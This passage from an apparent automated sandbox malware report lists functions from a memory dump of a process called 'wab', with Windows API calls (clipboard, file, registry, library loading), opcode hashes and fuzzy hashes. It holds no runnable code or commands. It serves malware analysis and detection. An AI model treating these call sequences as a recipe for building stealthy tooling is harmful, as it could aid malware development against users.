                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                              Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                              Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                              • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                              • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                              Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                              • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                              Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004095FC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3655998216-0
                                                              • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                              • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00445426
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                              • String ID:
                                                              • API String ID: 1828521557-0
                                                              • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                              • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                              Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID:
                                                              • API String ID: 2081463915-0
                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                              • String ID:
                                                              • API String ID: 2136311172-0
                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                              Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@
                                                              • String ID:
                                                              • API String ID: 1936579350-0
                                                              • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                              • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                                                              Non-executed Functions

                                                              Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                              • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                              • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                              • GetLastError.KERNEL32 ref: 00409974
                                                              • CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                              • String ID:
                                                              • API String ID: 2565263379-0
                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                              Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                              • API String ID: 2780580303-317687271
                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                              Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EmptyClipboard.USER32 ref: 00409882
                                                              • wcslen.MSVCRT ref: 0040988F
                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                              • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                              • memcpy.MSVCRT ref: 004098B5
                                                              • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                              • CloseClipboard.USER32 ref: 004098D7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                              • String ID:
                                                              • API String ID: 2014503067-0
                                                              • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                              • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                              Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                              • String ID: OsError 0x%x (%u)
                                                              • API String ID: 403622227-2664311388
                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                              Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              • OpenClipboard.USER32(?), ref: 00411878
                                                              • GetLastError.KERNEL32 ref: 0041188D
                                                              • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                              • String ID:
                                                              • API String ID: 1203541146-0
                                                              • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                              • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                              • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                              • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                              Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                              • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                              Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                              • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                              • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                              Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
